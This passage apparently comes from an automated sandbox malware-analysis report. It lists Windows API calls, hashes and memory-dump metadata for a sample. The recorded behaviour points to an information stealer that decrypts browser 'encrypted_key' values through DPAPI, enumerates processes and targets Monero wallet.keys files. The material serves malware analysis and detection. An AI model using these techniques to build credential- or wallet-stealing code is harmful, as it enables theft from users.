                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID:
                                        • API String ID: 367037083-0
                                        • Opcode ID: 7c5d2534a1ce81e0e7f8714ce1de5296260586e9fa937494c95a21d77e26d543
                                        • Instruction ID: 952108c9615b75a464e245e09de01b5687fbd3e802184cbf97e9cdb9b9343505
                                        • Opcode Fuzzy Hash: 7c5d2534a1ce81e0e7f8714ce1de5296260586e9fa937494c95a21d77e26d543
                                        • Instruction Fuzzy Hash: 2E411AB1D00209EBCB04EFA4D859FEEB779AF54308F10801DF51676290EB78AA05CBA1
                                        Function 007BA430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007BA13C
                                          • Part of subcall function 007BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007BA161
                                          • Part of subcall function 007BA110: LocalAlloc.KERNEL32(00000040,?), ref: 007BA181
                                          • Part of subcall function 007BA110: ReadFile.KERNEL32(000000FF,?,00000000,007B148F,00000000), ref: 007BA1AA
                                          • Part of subcall function 007BA110: LocalFree.KERNEL32(007B148F), ref: 007BA1E0
                                          • Part of subcall function 007BA110: CloseHandle.KERNEL32(000000FF), ref: 007BA1EA
                                          • Part of subcall function 007C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007C8FE2
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 007BA489
                                          • Part of subcall function 007BA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O{,00000000,00000000), ref: 007BA23F
                                          • Part of subcall function 007BA210: LocalAlloc.KERNEL32(00000040,?,?,?,007B4F3E,00000000,?), ref: 007BA251
                                          • Part of subcall function 007BA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O{,00000000,00000000), ref: 007BA27A
                                          • Part of subcall function 007BA210: LocalFree.KERNEL32(?,?,?,?,007B4F3E,00000000,?), ref: 007BA28F
                                          • Part of subcall function 007BA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007BA2D4
                                          • Part of subcall function 007BA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 007BA2F3
                                          • Part of subcall function 007BA2B0: LocalFree.KERNEL32(?), ref: 007BA323
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 2100535398-738592651
                                        • Opcode ID: acf97870d0d616024af0a0a45636db0debd243be5580e749b60bfed98342fbce
                                        • Instruction ID: 89d7daaae48c58bdc49e45b456c547355bc293f048bac2822c963b1f912b9e14
                                        • Opcode Fuzzy Hash: acf97870d0d616024af0a0a45636db0debd243be5580e749b60bfed98342fbce
                                        • Instruction Fuzzy Hash: 8F3130B6D0020DBBCF14EBE4DD46BEE77B8AF58304F444518E902A7241E7399E14CB62
                                        Function 007C8810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007D05BF), ref: 007C885A
                                        • Process32First.KERNEL32(?,00000128), ref: 007C886E
                                        • Process32Next.KERNEL32(?,00000128), ref: 007C8883
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • CloseHandle.KERNEL32(?), ref: 007C88F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: 633cdc5cda45e0140189842ee633e8fa203718ee469dd064fca3525ce79cf06b
                                        • Instruction ID: cf10513c51e0ff9896fd72068994f2341e65f02a83e20c2fd7b3edfe11f68cab
                                        • Opcode Fuzzy Hash: 633cdc5cda45e0140189842ee633e8fa203718ee469dd064fca3525ce79cf06b
                                        • Instruction Fuzzy Hash: 103148B1901218EBCB24DF95DC59FEEB778EB04705F10419DF10AA22A0DB386E44CFA1
                                        Function 0082FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0082FE13
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0082FE2C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Value___vcrt_
                                        • String ID:
                                        • API String ID: 1426506684-0
                                        • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction ID: 3e2eb72883d0bf8a67c6c4821a66075ce6656665ce707319f42af0aa981a6f6e
                                        • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction Fuzzy Hash: BB01B936109B35ADFA3526786CC996A26A4FB417B5B314339F216C81F3DF514C81D281
                                        Function 007CCA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __getptd.LIBCMT ref: 007CCA7E
                                          • Part of subcall function 007CC2A0: __amsg_exit.LIBCMT ref: 007CC2B0
                                        • __getptd.LIBCMT ref: 007CCA95
                                        • __amsg_exit.LIBCMT ref: 007CCAA3
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 007CCAC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 300741435-0
                                        • Opcode ID: 1abf4ae1f2e8c5b8dd722a984a5954511c53da4d5f7dd9110194f06b75baf9c7
                                        • Instruction ID: 619ebbdd31f5711dc0cef3aa26b18c6bb50abfbb9f8a67bd5fa46ddeb03edd40
                                        • Opcode Fuzzy Hash: 1abf4ae1f2e8c5b8dd722a984a5954511c53da4d5f7dd9110194f06b75baf9c7
                                        • Instruction Fuzzy Hash: C5F09032944219DBD622FBA8980FF5E73A0BF40720F14814EF809A62D2CB2C59418A99
                                        Function 008304D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Catch
                                        • String ID: MOC$RCC
                                        • API String ID: 78271584-2084237596
                                        • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction ID: c2e6d0ba7748e415e6afeea77baf48ec3f3ea56410c46cf790758c437454bdb7
                                        • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction Fuzzy Hash: F0414871900209AFDF16DF98DC92AEEBBB5FF88304F188199F904B6211D3359A90DF91
                                        Function 007C5190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007C8F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C51CA
                                        • lstrcat.KERNEL32(?,007D1058), ref: 007C51E7
                                        • lstrcat.KERNEL32(?,01658A48), ref: 007C51FB
                                        • lstrcat.KERNEL32(?,007D105C), ref: 007C520D
                                          • Part of subcall function 007C4B60: wsprintfA.USER32 ref: 007C4B7C
                                          • Part of subcall function 007C4B60: FindFirstFileA.KERNEL32(?,?), ref: 007C4B93
                                          • Part of subcall function 007C4B60: StrCmpCA.SHLWAPI(?,007D0FC4), ref: 007C4BC1
                                          • Part of subcall function 007C4B60: StrCmpCA.SHLWAPI(?,007D0FC8), ref: 007C4BD7
                                          • Part of subcall function 007C4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 007C4DCD
                                          • Part of subcall function 007C4B60: FindClose.KERNEL32(000000FF), ref: 007C4DE2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: 4bf2a6d62b4b10feca91201fc9389c03e8a8ed58451a8a3b402cc38909b5037e
                                        • Instruction ID: a19bfe7af75a980eb932fdce0a1220b766c3f6ccf5bcbd66df7bca2cc7ef2c44
                                        • Opcode Fuzzy Hash: 4bf2a6d62b4b10feca91201fc9389c03e8a8ed58451a8a3b402cc38909b5037e
                                        • Instruction Fuzzy Hash: 1D21AAF6900208E7DB54FBB0EC96FED333C9B98300F40455DB65556191EE789AC98BA1